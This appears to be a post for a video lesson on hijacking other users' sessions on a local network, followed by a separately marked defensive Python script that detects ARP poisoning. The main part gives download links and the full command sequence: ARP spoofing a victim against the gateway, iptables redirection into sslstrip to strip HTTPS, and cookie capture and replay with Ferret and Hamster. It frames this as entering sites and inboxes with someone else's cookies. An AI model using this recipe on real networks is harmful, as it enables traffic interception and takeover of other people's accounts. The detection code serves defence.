In this video lesson I show how to use a few programs to clone cookies (session sidejacking) on a local network, e.g. entering a given domain (sites, forums, e-mail inboxes, etc.) with someone else's cookies. haha...
Used in the video:
arpspoof
sslstrip
Hamster (and Ferret)
Programs:
arpspoof (DSniff), version 2.3: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz
sslstrip, version 0.6: http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.6.tar.gz
Hamster Sidejacking Tool, version 2.0: http://hamster.erratasec.com/downloads/hamster-2.0.0.tar.z
Commands:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 10.1.1.100 10.1.1.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -p -k -f
/pentest/sniffers/hamster/ferret -i eth0
/pentest/sniffers/hamster/hamster
Konqueror -> Settings -> Configure Konqueror -> Proxy -> Manually. 127.0.0.1:1234
Konqueror -> http://hamster
Previews:
http://img685.imageshack.us/img685/9859/sidejaking.png
http://img88.imageshack.us/img88/4425/sidejaking1.png
Download:
http://www.4shared.com/file/fVOJq_zW/Sidejacking.html
Watch online:
http://blip.tv/file/3519001
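
For defenders, the arpspoof step in the commands above leaves a visible trace on the targeted host: the gateway IP (10.1.1.1 here) resolves to a MAC address that also belongs to another host. The Python check below is an added example, not part of the original post; the `ip neigh show` sample is constructed, and the second host 10.1.1.50, the MAC values and the function names are assumptions.

```python
import re

# Constructed sample of `ip neigh show` output as seen on host 10.1.1.100
# (illustrative values, not captured data).
SAMPLE_NEIGH = """\
10.1.1.1 dev eth0 lladdr 00:0c:29:aa:bb:cc REACHABLE
10.1.1.50 dev eth0 lladdr 00:0c:29:aa:bb:cc STALE
10.1.1.20 dev eth0 lladdr 00:1a:2b:3c:4d:5e REACHABLE
10.1.1.30 dev eth0  FAILED
"""

NEIGH_RE = re.compile(
    r"^(?P<ip>\S+) dev (?P<dev>\S+) lladdr (?P<mac>[0-9a-fA-F:]{17})\b"
)


def parse_neigh(text):
    """Return {ip: mac} for entries that carry a link-layer address."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:  # unresolved entries (FAILED/INCOMPLETE) have no lladdr
            table[m["ip"]] = m["mac"].lower()
    return table


def check_gateway(table, gateway_ip, known_gateway_mac=None):
    """Return findings about the gateway's neighbor entry."""
    gw_mac = table.get(gateway_ip)
    if gw_mac is None:
        return ["gateway %s has no resolved entry" % gateway_ip]
    findings = []
    # Check 1: compare against a MAC recorded while the network was trusted.
    if known_gateway_mac and gw_mac != known_gateway_mac.lower():
        findings.append("gateway %s is at %s, expected %s"
                        % (gateway_ip, gw_mac, known_gateway_mac.lower()))
    # Check 2: another IP sharing the gateway's MAC is typical of ARP
    # poisoning (a router with several addresses can also cause this).
    sharing = sorted(ip for ip, mac in table.items()
                     if mac == gw_mac and ip != gateway_ip)
    if sharing:
        findings.append("gateway %s shares MAC %s with %s"
                        % (gateway_ip, gw_mac, ", ".join(sharing)))
    return findings


if __name__ == "__main__":
    for finding in check_gateway(parse_neigh(SAMPLE_NEIGH), "10.1.1.1"):
        print("ALERT:", finding)
```

On a live host the same functions can be fed the output of `ip neigh show`; the underlying fixes for the sslstrip and cookie-capture steps are HSTS and the Secure cookie attribute on the server side.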